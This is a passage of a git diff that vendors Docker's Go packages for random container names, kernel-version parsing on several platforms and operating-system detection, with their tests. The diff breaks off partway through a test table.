+		// Florence Nightingale, more prominently known as a nurse, was also the first female member of the Royal Statistical Society and a pioneer in statistical graphics https://en.wikipedia.org/wiki/Florence_Nightingale#Statistics_and_sanitary_reform
+		"nightingale",
+
+		// Alfred Nobel - a Swedish chemist, engineer, innovator, and armaments manufacturer (inventor of dynamite) - https://en.wikipedia.org/wiki/Alfred_Nobel
+		"nobel",
+
+		// Emmy Noether, German mathematician. Noether's Theorem is named after her. https://en.wikipedia.org/wiki/Emmy_Noether
+		"noether",
+
+		// Poppy Northcutt. Poppy Northcutt was the first woman to work as part of NASA’s Mission Control. http://www.businessinsider.com/poppy-northcutt-helped-apollo-astronauts-2014-12?op=1
+		"northcutt",
+
+		// Robert Noyce invented silicone integrated circuits and gave Silicon Valley its name. - https://en.wikipedia.org/wiki/Robert_Noyce
+		"noyce",
+
+		// Panini - Ancient Indian linguist and grammarian from 4th century CE who worked on the world's first formal system - https://en.wikipedia.org/wiki/P%C4%81%E1%B9%87ini#Comparison_with_modern_formal_systems
+		"panini",
+
+		// Ambroise Pare invented modern surgery. https://en.wikipedia.org/wiki/Ambroise_Par%C3%A9
+		"pare",
+
+		// Louis Pasteur discovered vaccination, fermentation and pasteurization. https://en.wikipedia.org/wiki/Louis_Pasteur.
+		"pasteur",
+
+		// Cecilia Payne-Gaposchkin was an astronomer and astrophysicist who, in 1925, proposed in her Ph.D. thesis an explanation for the composition of stars in terms of the relative abundances of hydrogen and helium. https://en.wikipedia.org/wiki/Cecilia_Payne-Gaposchkin
+		"payne",
+
+		// Radia Perlman is a software designer and network engineer and most famous for her invention of the spanning-tree protocol (STP). https://en.wikipedia.org/wiki/Radia_Perlman
+		"perlman",
+
+		// Rob Pike was a key contributor to Unix, Plan 9, the X graphic system, utf-8, and the Go programming language. https://en.wikipedia.org/wiki/Rob_Pike
+		"pike",
+
+		// Henri Poincaré made fundamental contributions in several fields of mathematics. https://en.wikipedia.org/wiki/Henri_Poincar%C3%A9
+		"poincare",
+
+		// Laura Poitras is a director and producer whose work, made possible by open source crypto tools, advances the causes of truth and freedom of information by reporting disclosures by whistleblowers such as Edward Snowden. https://en.wikipedia.org/wiki/Laura_Poitras
+		"poitras",
+
+		// Claudius Ptolemy - a Greco-Egyptian writer of Alexandria, known as a mathematician, astronomer, geographer, astrologer, and poet of a single epigram in the Greek Anthology - https://en.wikipedia.org/wiki/Ptolemy
+		"ptolemy",
+
+		// C. V. Raman - Indian physicist who won the Nobel Prize in 1930 for proposing the Raman effect. - https://en.wikipedia.org/wiki/C._V._Raman
+		"raman",
+
+		// Srinivasa Ramanujan - Indian mathematician and autodidact who made extraordinary contributions to mathematical analysis, number theory, infinite series, and continued fractions. - https://en.wikipedia.org/wiki/Srinivasa_Ramanujan
+		"ramanujan",
+
+		// Sally Kristen Ride was an American physicist and astronaut. She was the first American woman in space, and the youngest American astronaut. https://en.wikipedia.org/wiki/Sally_Ride
+		"ride",
+
+		// Rita Levi-Montalcini - Won Nobel Prize in Physiology or Medicine jointly with colleague Stanley Cohen for the discovery of nerve growth factor (https://en.wikipedia.org/wiki/Rita_Levi-Montalcini)
+		"montalcini",
+
+		// Dennis Ritchie - co-creator of UNIX and the C programming language. - https://en.wikipedia.org/wiki/Dennis_Ritchie
+		"ritchie",
+
+		// Wilhelm Conrad Röntgen - German physicist who was awarded the first Nobel Prize in Physics in 1901 for the discovery of X-rays (Röntgen rays). https://en.wikipedia.org/wiki/Wilhelm_R%C3%B6ntgen
+		"roentgen",
+
+		// Rosalind Franklin - British biophysicist and X-ray crystallographer whose research was critical to the understanding of DNA - https://en.wikipedia.org/wiki/Rosalind_Franklin
+		"rosalind",
+
+		// Meghnad Saha - Indian astrophysicist best known for his development of the Saha equation, used to describe chemical and physical conditions in stars - https://en.wikipedia.org/wiki/Meghnad_Saha
+		"saha",
+
+		// Jean E. Sammet developed FORMAC, the first widely used computer language for symbolic manipulation of mathematical formulas. https://en.wikipedia.org/wiki/Jean_E._Sammet
+		"sammet",
+
+		// Carol Shaw - Originally an Atari employee, Carol Shaw is said to be the first female video game designer. https://en.wikipedia.org/wiki/Carol_Shaw_(video_game_designer)
+		"shaw",
+
+		// Dame Stephanie "Steve" Shirley - Founded a software company in 1962 employing women working from home. https://en.wikipedia.org/wiki/Steve_Shirley
+		"shirley",
+
+		// William Shockley co-invented the transistor - https://en.wikipedia.org/wiki/William_Shockley
+		"shockley",
+
+		// Françoise Barré-Sinoussi - French virologist and Nobel Prize Laureate in Physiology or Medicine; her work was fundamental in identifying HIV as the cause of AIDS. https://en.wikipedia.org/wiki/Fran%C3%A7oise_Barr%C3%A9-Sinoussi
+		"sinoussi",
+
+		// Betty Snyder - one of the original programmers of the ENIAC. https://en.wikipedia.org/wiki/ENIAC - https://en.wikipedia.org/wiki/Betty_Holberton
+		"snyder",
+
+		// Frances Spence - one of the original programmers of the ENIAC. https://en.wikipedia.org/wiki/ENIAC - https://en.wikipedia.org/wiki/Frances_Spence
+		"spence",
+
+		// Richard Matthew Stallman - the founder of the Free Software movement, the GNU project, the Free Software Foundation, and the League for Programming Freedom. He also invented the concept of copyleft to protect the ideals of this movement, and enshrined this concept in the widely-used GPL (General Public License) for software. https://en.wikiquote.org/wiki/Richard_Stallman
+		"stallman",
+
+		// Michael Stonebraker is a database research pioneer and architect of Ingres, Postgres, VoltDB and SciDB. Winner of 2014 ACM Turing Award. https://en.wikipedia.org/wiki/Michael_Stonebraker
+		"stonebraker",
+
+		// Janese Swanson (with others) developed the first of the Carmen Sandiego games. She went on to found Girl Tech. https://en.wikipedia.org/wiki/Janese_Swanson
+		"swanson",
+
+		// Aaron Swartz was influential in creating RSS, Markdown, Creative Commons, Reddit, and much of the internet as we know it today. He was devoted to freedom of information on the web. https://en.wikiquote.org/wiki/Aaron_Swartz
+		"swartz",
+
+		// Bertha Swirles was a theoretical physicist who made a number of contributions to early quantum theory. https://en.wikipedia.org/wiki/Bertha_Swirles
+		"swirles",
+
+		// Nikola Tesla invented the AC electric system and every gadget ever used by a James Bond villain. https://en.wikipedia.org/wiki/Nikola_Tesla
+		"tesla",
+
+		// Ken Thompson - co-creator of UNIX and the C programming language - https://en.wikipedia.org/wiki/Ken_Thompson
+		"thompson",
+
+		// Linus Torvalds invented Linux and Git. https://en.wikipedia.org/wiki/Linus_Torvalds
+		"torvalds",
+
+		// Alan Turing was a founding father of computer science. https://en.wikipedia.org/wiki/Alan_Turing.
+		"turing",
+
+		// Varahamihira - Ancient Indian mathematician who discovered trigonometric formulae during 505-587 CE - https://en.wikipedia.org/wiki/Var%C4%81hamihira#Contributions
+		"varahamihira",
+
+		// Sir Mokshagundam Visvesvaraya - is a notable Indian engineer.  He is a recipient of the Indian Republic's highest honour, the Bharat Ratna, in 1955. On his birthday, 15 September is celebrated as Engineer's Day in India in his memory - https://en.wikipedia.org/wiki/Visvesvaraya
+		"visvesvaraya",
+
+		// Christiane Nüsslein-Volhard - German biologist, won Nobel Prize in Physiology or Medicine in 1995 for research on the genetic control of embryonic development. https://en.wikipedia.org/wiki/Christiane_N%C3%BCsslein-Volhard
+		"volhard",
+
+		// Marlyn Wescoff - one of the original programmers of the ENIAC. https://en.wikipedia.org/wiki/ENIAC - https://en.wikipedia.org/wiki/Marlyn_Meltzer
+		"wescoff",
+
+		// Andrew Wiles - Notable British mathematician who proved the enigmatic Fermat's Last Theorem - https://en.wikipedia.org/wiki/Andrew_Wiles
+		"wiles",
+
+		// Roberta Williams, did pioneering work in graphical adventure games for personal computers, particularly the King's Quest series. https://en.wikipedia.org/wiki/Roberta_Williams
+		"williams",
+
+		// Sophie Wilson designed the first Acorn Micro-Computer and the instruction set for ARM processors. https://en.wikipedia.org/wiki/Sophie_Wilson
+		"wilson",
+
+		// Jeannette Wing - co-developed the Liskov substitution principle. - https://en.wikipedia.org/wiki/Jeannette_Wing
+		"wing",
+
+		// Steve Wozniak invented the Apple I and Apple II. https://en.wikipedia.org/wiki/Steve_Wozniak
+		"wozniak",
+
+		// The Wright brothers, Orville and Wilbur - credited with inventing and building the world's first successful airplane and making the first controlled, powered and sustained heavier-than-air human flight - https://en.wikipedia.org/wiki/Wright_brothers
+		"wright",
+
+		// Rosalyn Sussman Yalow - Rosalyn Sussman Yalow was an American medical physicist, and a co-winner of the 1977 Nobel Prize in Physiology or Medicine for development of the radioimmunoassay technique. https://en.wikipedia.org/wiki/Rosalyn_Sussman_Yalow
+		"yalow",
+
+		// Ada Yonath - an Israeli crystallographer, the first woman from the Middle East to win a Nobel prize in the sciences. https://en.wikipedia.org/wiki/Ada_Yonath
+		"yonath",
+	}
+)
+
+// GetRandomName generates a random name from the list of adjectives and surnames in this package
+// formatted as "adjective_surname". For example 'focused_turing'. If retry is non-zero, a random
+// integer between 0 and 10 will be added to the end of the name, e.g `focused_turing3`
+func GetRandomName(retry int) string {
+	rnd := random.Rand
+begin:
+	name := fmt.Sprintf("%s_%s", left[rnd.Intn(len(left))], right[rnd.Intn(len(right))])
+	if name == "boring_wozniak" /* Steve Wozniak is not boring */ {
+		goto begin
+	}
+
+	if retry > 0 {
+		name = fmt.Sprintf("%s%d", name, rnd.Intn(10))
+	}
+	return name
+}
diff --git a/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator_test.go b/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator_test.go
new file mode 100644
index 0000000000..d1a94977d7
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator_test.go
@@ -0,0 +1,27 @@
+package namesgenerator
+
+import (
+	"strings"
+	"testing"
+)
+
+func TestNameFormat(t *testing.T) {
+	name := GetRandomName(0)
+	if !strings.Contains(name, "_") {
+		t.Fatalf("Generated name does not contain an underscore")
+	}
+	if strings.ContainsAny(name, "0123456789") {
+		t.Fatalf("Generated name contains numbers!")
+	}
+}
+
+func TestNameRetries(t *testing.T) {
+	name := GetRandomName(1)
+	if !strings.Contains(name, "_") {
+		t.Fatalf("Generated name does not contain an underscore")
+	}
+	if !strings.ContainsAny(name, "0123456789") {
+		t.Fatalf("Generated name doesn't contain a number")
+	}
+
+}
diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel.go
new file mode 100644
index 0000000000..7738fc7411
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel.go
@@ -0,0 +1,74 @@
+// +build !windows
+
+// Package kernel provides helper function to get, parse and compare kernel
+// versions for different platforms.
+package kernel
+
+import (
+	"errors"
+	"fmt"
+)
+
+// VersionInfo holds information about the kernel.
+type VersionInfo struct {
+	Kernel int    // Version of the kernel (e.g. 4.1.2-generic -> 4)
+	Major  int    // Major part of the kernel version (e.g. 4.1.2-generic -> 1)
+	Minor  int    // Minor part of the kernel version (e.g. 4.1.2-generic -> 2)
+	Flavor string // Flavor of the kernel version (e.g. 4.1.2-generic -> generic)
+}
+
+func (k *VersionInfo) String() string {
+	return fmt.Sprintf("%d.%d.%d%s", k.Kernel, k.Major, k.Minor, k.Flavor)
+}
+
+// CompareKernelVersion compares two kernel.VersionInfo structs.
+// Returns -1 if a < b, 0 if a == b, 1 it a > b
+func CompareKernelVersion(a, b VersionInfo) int {
+	if a.Kernel < b.Kernel {
+		return -1
+	} else if a.Kernel > b.Kernel {
+		return 1
+	}
+
+	if a.Major < b.Major {
+		return -1
+	} else if a.Major > b.Major {
+		return 1
+	}
+
+	if a.Minor < b.Minor {
+		return -1
+	} else if a.Minor > b.Minor {
+		return 1
+	}
+
+	return 0
+}
+
+// ParseRelease parses a string and creates a VersionInfo based on it.
+func ParseRelease(release string) (*VersionInfo, error) {
+	var (
+		kernel, major, minor, parsed int
+		flavor, partial              string
+	)
+
+	// Ignore error from Sscanf to allow an empty flavor.  Instead, just
+	// make sure we got all the version numbers.
+	parsed, _ = fmt.Sscanf(release, "%d.%d%s", &kernel, &major, &partial)
+	if parsed < 2 {
+		return nil, errors.New("Can't parse kernel version " + release)
+	}
+
+	// sometimes we have 3.12.25-gentoo, but sometimes we just have 3.12-1-amd64
+	parsed, _ = fmt.Sscanf(partial, ".%d%s", &minor, &flavor)
+	if parsed < 1 {
+		flavor = partial
+	}
+
+	return &VersionInfo{
+		Kernel: kernel,
+		Major:  major,
+		Minor:  minor,
+		Flavor: flavor,
+	}, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_darwin.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_darwin.go
new file mode 100644
index 0000000000..71f205b285
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_darwin.go
@@ -0,0 +1,56 @@
+// +build darwin
+
+// Package kernel provides helper function to get, parse and compare kernel
+// versions for different platforms.
+package kernel
+
+import (
+	"fmt"
+	"os/exec"
+	"strings"
+
+	"github.com/mattn/go-shellwords"
+)
+
+// GetKernelVersion gets the current kernel version.
+func GetKernelVersion() (*VersionInfo, error) {
+	release, err := getRelease()
+	if err != nil {
+		return nil, err
+	}
+
+	return ParseRelease(release)
+}
+
+// getRelease uses `system_profiler SPSoftwareDataType` to get OSX kernel version
+func getRelease() (string, error) {
+	cmd := exec.Command("system_profiler", "SPSoftwareDataType")
+	osName, err := cmd.Output()
+	if err != nil {
+		return "", err
+	}
+
+	var release string
+	data := strings.Split(string(osName), "\n")
+	for _, line := range data {
+		if strings.Contains(line, "Kernel Version") {
+			// It has the format like '      Kernel Version: Darwin 14.5.0'
+			content := strings.SplitN(line, ":", 2)
+			if len(content) != 2 {
+				return "", fmt.Errorf("Kernel Version is invalid")
+			}
+
+			prettyNames, err := shellwords.Parse(content[1])
+			if err != nil {
+				return "", fmt.Errorf("Kernel Version is invalid: %s", err.Error())
+			}
+
+			if len(prettyNames) != 2 {
+				return "", fmt.Errorf("Kernel Version needs to be 'Darwin x.x.x' ")
+			}
+			release = prettyNames[1]
+		}
+	}
+
+	return release, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix.go
new file mode 100644
index 0000000000..744d5e1f83
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix.go
@@ -0,0 +1,45 @@
+// +build linux freebsd solaris
+
+// Package kernel provides helper function to get, parse and compare kernel
+// versions for different platforms.
+package kernel
+
+import (
+	"bytes"
+
+	"github.com/Sirupsen/logrus"
+)
+
+// GetKernelVersion gets the current kernel version.
+func GetKernelVersion() (*VersionInfo, error) {
+	uts, err := uname()
+	if err != nil {
+		return nil, err
+	}
+
+	release := make([]byte, len(uts.Release))
+
+	i := 0
+	for _, c := range uts.Release {
+		release[i] = byte(c)
+		i++
+	}
+
+	// Remove the \x00 from the release for Atoi to parse correctly
+	release = release[:bytes.IndexByte(release, 0)]
+
+	return ParseRelease(string(release))
+}
+
+// CheckKernelVersion checks if current kernel is newer than (or equal to)
+// the given version.
+func CheckKernelVersion(k, major, minor int) bool {
+	if v, err := GetKernelVersion(); err != nil {
+		logrus.Warnf("error getting kernel version: %s", err)
+	} else {
+		if CompareKernelVersion(*v, VersionInfo{Kernel: k, Major: major, Minor: minor}) < 0 {
+			return false
+		}
+	}
+	return true
+}
diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix_test.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix_test.go
new file mode 100644
index 0000000000..dc8c0e307b
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix_test.go
@@ -0,0 +1,96 @@
+// +build !windows
+
+package kernel
+
+import (
+	"fmt"
+	"testing"
+)
+
+func assertParseRelease(t *testing.T, release string, b *VersionInfo, result int) {
+	var (
+		a *VersionInfo
+	)
+	a, _ = ParseRelease(release)
+
+	if r := CompareKernelVersion(*a, *b); r != result {
+		t.Fatalf("Unexpected kernel version comparison result for (%v,%v). Found %d, expected %d", release, b, r, result)
+	}
+	if a.Flavor != b.Flavor {
+		t.Fatalf("Unexpected parsed kernel flavor.  Found %s, expected %s", a.Flavor, b.Flavor)
+	}
+}
+
+// TestParseRelease tests the ParseRelease() function
+func TestParseRelease(t *testing.T) {
+	assertParseRelease(t, "3.8.0", &VersionInfo{Kernel: 3, Major: 8, Minor: 0}, 0)
+	assertParseRelease(t, "3.4.54.longterm-1", &VersionInfo{Kernel: 3, Major: 4, Minor: 54, Flavor: ".longterm-1"}, 0)
+	assertParseRelease(t, "3.4.54.longterm-1", &VersionInfo{Kernel: 3, Major: 4, Minor: 54, Flavor: ".longterm-1"}, 0)
+	assertParseRelease(t, "3.8.0-19-generic", &VersionInfo{Kernel: 3, Major: 8, Minor: 0, Flavor: "-19-generic"}, 0)
+	assertParseRelease(t, "3.12.8tag", &VersionInfo{Kernel: 3, Major: 12, Minor: 8, Flavor: "tag"}, 0)
+	assertParseRelease(t, "3.12-1-amd64", &VersionInfo{Kernel: 3, Major: 12, Minor: 0, Flavor: "-1-amd64"}, 0)
+	assertParseRelease(t, "3.8.0", &VersionInfo{Kernel: 4, Major: 8, Minor: 0}, -1)
+	// Errors
+	invalids := []string{
+		"3",
+		"a",
+		"a.a",
+		"a.a.a-a",
+	}
+	for _, invalid := range invalids {
+		expectedMessage := fmt.Sprintf("Can't parse kernel version %v", invalid)
+		if _, err := ParseRelease(invalid); err == nil || err.Error() != expectedMessage {
+
+		}
+	}
+}
+
+func assertKernelVersion(t *testing.T, a, b VersionInfo, result int) {
+	if r := CompareKernelVersion(a, b); r != result {
+		t.Fatalf("Unexpected kernel version comparison result. Found %d, expected %d", r, result)
+	}
+}
+
+// TestCompareKernelVersion tests the CompareKernelVersion() function
+func TestCompareKernelVersion(t *testing.T) {
+	assertKernelVersion(t,
+		VersionInfo{Kernel: 3, Major: 8, Minor: 0},
+		VersionInfo{Kernel: 3, Major: 8, Minor: 0},
+		0)
+	assertKernelVersion(t,
+		VersionInfo{Kernel: 2, Major: 6, Minor: 0},
+		VersionInfo{Kernel: 3, Major: 8, Minor: 0},
+		-1)
+	assertKernelVersion(t,
+		VersionInfo{Kernel: 3, Major: 8, Minor: 0},
+		VersionInfo{Kernel: 2, Major: 6, Minor: 0},
+		1)
+	assertKernelVersion(t,
+		VersionInfo{Kernel: 3, Major: 8, Minor: 0},
+		VersionInfo{Kernel: 3, Major: 8, Minor: 0},
+		0)
+	assertKernelVersion(t,
+		VersionInfo{Kernel: 3, Major: 8, Minor: 5},
+		VersionInfo{Kernel: 3, Major: 8, Minor: 0},
+		1)
+	assertKernelVersion(t,
+		VersionInfo{Kernel: 3, Major: 0, Minor: 20},
+		VersionInfo{Kernel: 3, Major: 8, Minor: 0},
+		-1)
+	assertKernelVersion(t,
+		VersionInfo{Kernel: 3, Major: 7, Minor: 20},
+		VersionInfo{Kernel: 3, Major: 8, Minor: 0},
+		-1)
+	assertKernelVersion(t,
+		VersionInfo{Kernel: 3, Major: 8, Minor: 20},
+		VersionInfo{Kernel: 3, Major: 7, Minor: 0},
+		1)
+	assertKernelVersion(t,
+		VersionInfo{Kernel: 3, Major: 8, Minor: 20},
+		VersionInfo{Kernel: 3, Major: 8, Minor: 0},
+		1)
+	assertKernelVersion(t,
+		VersionInfo{Kernel: 3, Major: 8, Minor: 0},
+		VersionInfo{Kernel: 3, Major: 8, Minor: 20},
+		-1)
+}
diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_windows.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_windows.go
new file mode 100644
index 0000000000..80fab8ff64
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_windows.go
@@ -0,0 +1,69 @@
+// +build windows
+
+package kernel
+
+import (
+	"fmt"
+	"syscall"
+	"unsafe"
+)
+
+// VersionInfo holds information about the kernel.
+type VersionInfo struct {
+	kvi   string // Version of the kernel (e.g. 6.1.7601.17592 -> 6)
+	major int    // Major part of the kernel version (e.g. 6.1.7601.17592 -> 1)
+	minor int    // Minor part of the kernel version (e.g. 6.1.7601.17592 -> 7601)
+	build int    // Build number of the kernel version (e.g. 6.1.7601.17592 -> 17592)
+}
+
+func (k *VersionInfo) String() string {
+	return fmt.Sprintf("%d.%d %d (%s)", k.major, k.minor, k.build, k.kvi)
+}
+
+// GetKernelVersion gets the current kernel version.
+func GetKernelVersion() (*VersionInfo, error) {
+
+	var (
+		h         syscall.Handle
+		dwVersion uint32
+		err       error
+	)
+
+	KVI := &VersionInfo{"Unknown", 0, 0, 0}
+
+	if err = syscall.RegOpenKeyEx(syscall.HKEY_LOCAL_MACHINE,
+		syscall.StringToUTF16Ptr(`SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\`),
+		0,
+		syscall.KEY_READ,
+		&h); err != nil {
+		return KVI, err
+	}
+	defer syscall.RegCloseKey(h)
+
+	var buf [1 << 10]uint16
+	var typ uint32
+	n := uint32(len(buf) * 2) // api expects array of bytes, not uint16
+
+	if err = syscall.RegQueryValueEx(h,
+		syscall.StringToUTF16Ptr("BuildLabEx"),
+		nil,
+		&typ,
+		(*byte)(unsafe.Pointer(&buf[0])),
+		&n); err != nil {
+		return KVI, err
+	}
+
+	KVI.kvi = syscall.UTF16ToString(buf[:])
+
+	// Important - docker.exe MUST be manifested for this API to return
+	// the correct information.
+	if dwVersion, err = syscall.GetVersion(); err != nil {
+		return KVI, err
+	}
+
+	KVI.major = int(dwVersion & 0xFF)
+	KVI.minor = int((dwVersion & 0XFF00) >> 8)
+	KVI.build = int((dwVersion & 0xFFFF0000) >> 16)
+
+	return KVI, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_linux.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_linux.go
new file mode 100644
index 0000000000..bb9b32641e
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_linux.go
@@ -0,0 +1,19 @@
+package kernel
+
+import (
+	"syscall"
+)
+
+// Utsname represents the system name structure.
+// It is passthrough for syscall.Utsname in order to make it portable with
+// other platforms where it is not available.
+type Utsname syscall.Utsname
+
+func uname() (*syscall.Utsname, error) {
+	uts := &syscall.Utsname{}
+
+	if err := syscall.Uname(uts); err != nil {
+		return nil, err
+	}
+	return uts, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_solaris.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_solaris.go
new file mode 100644
index 0000000000..49370bd3dd
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_solaris.go
@@ -0,0 +1,14 @@
+package kernel
+
+import (
+	"golang.org/x/sys/unix"
+)
+
+func uname() (*unix.Utsname, error) {
+	uts := &unix.Utsname{}
+
+	if err := unix.Uname(uts); err != nil {
+		return nil, err
+	}
+	return uts, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_unsupported.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_unsupported.go
new file mode 100644
index 0000000000..1da3f239fa
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_unsupported.go
@@ -0,0 +1,18 @@
+// +build !linux,!solaris
+
+package kernel
+
+import (
+	"errors"
+)
+
+// Utsname represents the system name structure.
+// It is defined here to make it portable as it is available on linux but not
+// on windows.
+type Utsname struct {
+	Release [65]byte
+}
+
+func uname() (*Utsname, error) {
+	return nil, errors.New("Kernel version detection is available only on linux")
+}
diff --git a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_linux.go b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_linux.go
new file mode 100644
index 0000000000..e04a3499af
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_linux.go
@@ -0,0 +1,77 @@
+// Package operatingsystem provides helper function to get the operating system
+// name for different platforms.
+package operatingsystem
+
+import (
+	"bufio"
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"os"
+	"strings"
+
+	"github.com/mattn/go-shellwords"
+)
+
+var (
+	// file to use to detect if the daemon is running in a container
+	proc1Cgroup = "/proc/1/cgroup"
+
+	// file to check to determine Operating System
+	etcOsRelease = "/etc/os-release"
+
+	// used by stateless systems like Clear Linux
+	altOsRelease = "/usr/lib/os-release"
+)
+
+// GetOperatingSystem gets the name of the current operating system.
+func GetOperatingSystem() (string, error) {
+	osReleaseFile, err := os.Open(etcOsRelease)
+	if err != nil {
+		if !os.IsNotExist(err) {
+			return "", fmt.Errorf("Error opening %s: %v", etcOsRelease, err)
+		}
+		osReleaseFile, err = os.Open(altOsRelease)
+		if err != nil {
+			return "", fmt.Errorf("Error opening %s: %v", altOsRelease, err)
+		}
+	}
+	defer osReleaseFile.Close()
+
+	var prettyName string
+	scanner := bufio.NewScanner(osReleaseFile)
+	for scanner.Scan() {
+		line := scanner.Text()
+		if strings.HasPrefix(line, "PRETTY_NAME=") {
+			data := strings.SplitN(line, "=", 2)
+			prettyNames, err := shellwords.Parse(data[1])
+			if err != nil {
+				return "", fmt.Errorf("PRETTY_NAME is invalid: %s", err.Error())
+			}
+			if len(prettyNames) != 1 {
+				return "", fmt.Errorf("PRETTY_NAME needs to be enclosed by quotes if they have spaces: %s", data[1])
+			}
+			prettyName = prettyNames[0]
+		}
+	}
+	if prettyName != "" {
+		return prettyName, nil
+	}
+	// If not set, defaults to PRETTY_NAME="Linux"
+	// c.f. http://www.freedesktop.org/software/systemd/man/os-release.html
+	return "Linux", nil
+}
+
+// IsContainerized returns true if we are running inside a container.
+func IsContainerized() (bool, error) {
+	b, err := ioutil.ReadFile(proc1Cgroup)
+	if err != nil {
+		return false, err
+	}
+	for _, line := range bytes.Split(b, []byte{'\n'}) {
+		if len(line) > 0 && !bytes.HasSuffix(line, []byte{'/'}) && !bytes.HasSuffix(line, []byte("init.scope")) {
+			return true, nil
+		}
+	}
+	return false, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_solaris.go b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_solaris.go
new file mode 100644
index 0000000000..d08ad14860
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_solaris.go
@@ -0,0 +1,37 @@
+// +build solaris,cgo
+
+package operatingsystem
+
+/*
+#include <zone.h>
+*/
+import "C"
+
+import (
+	"bytes"
+	"errors"
+	"io/ioutil"
+)
+
+var etcOsRelease = "/etc/release"
+
+// GetOperatingSystem gets the name of the current operating system.
+func GetOperatingSystem() (string, error) {
+	b, err := ioutil.ReadFile(etcOsRelease)
+	if err != nil {
+		return "", err
+	}
+	if i := bytes.Index(b, []byte("\n")); i >= 0 {
+		b = bytes.Trim(b[:i], " ")
+		return string(b), nil
+	}
+	return "", errors.New("release not found")
+}
+
+// IsContainerized returns true if we are running inside a container.
+func IsContainerized() (bool, error) {
+	if C.getzoneid() != 0 {
+		return true, nil
+	}
+	return false, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix.go b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix.go
new file mode 100644
index 0000000000..bc91c3c533
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix.go
@@ -0,0 +1,25 @@
+// +build freebsd darwin
+
+package operatingsystem
+
+import (
+	"errors"
+	"os/exec"
+)
+
+// GetOperatingSystem gets the name of the current operating system.
+func GetOperatingSystem() (string, error) {
+	cmd := exec.Command("uname", "-s")
+	osName, err := cmd.Output()
+	if err != nil {
+		return "", err
+	}
+	return string(osName), nil
+}
+
+// IsContainerized returns true if we are running inside a container.
+// No-op on FreeBSD and Darwin, always returns false.
+func IsContainerized() (bool, error) {
+	// TODO: Implement jail detection for freeBSD
+	return false, errors.New("Cannot detect if we are in container")
+}
diff --git a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix_test.go b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix_test.go
new file mode 100644
index 0000000000..e7120c65c4
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix_test.go
@@ -0,0 +1,247 @@
+// +build linux freebsd
+
+package operatingsystem
+
+import (
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"testing"
+)
+
+func TestGetOperatingSystem(t *testing.T) {
+	var backup = etcOsRelease
+
+	invalids := []struct {
+		content       string
+		errorExpected string
+	}{
+		{
+			`PRETTY_NAME=Source Mage GNU/Linux
+PRETTY_NAME=Ubuntu 14.04.LTS`,
+			"PRETTY_NAME needs to be enclosed by quotes if they have spaces: Source Mage GNU/Linux",
+		},
+		{
+			`PRETTY_NAME="Ubuntu Linux
+PRETTY_NAME=Ubuntu 14.04.LTS`,
+			"PRETTY_NAME is invalid: invalid command line string",
+		},
+		{
+			`PRETTY_NAME=Ubuntu'
+PRETTY_NAME=Ubuntu 14.04.LTS`,
+			"PRETTY_NAME is invalid: invalid command line string",
+		},
+		{
+			`PRETTY_NAME'
+PRETTY_NAME=Ubuntu 14.04.LTS`,
+			"PRETTY_NAME needs to be enclosed by quotes if they have spaces: Ubuntu 14.04.LTS",
+		},
+	}
+
+	valids := []struct {
+		content  string
+		expected string
+	}{
+		{
+			`NAME="Ubuntu"
+PRETTY_NAME_AGAIN="Ubuntu 14.04.LTS"
+VERSION="14.04, Trusty Tahr"
+ID=ubuntu
+ID_LIKE=debian
+VERSION_ID="14.04"
+HOME_URL="http://www.ubuntu.com/"
+SUPPORT_URL="http://help.ubuntu.com/"
+BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"`,
+			"Linux",
+		},
+		{
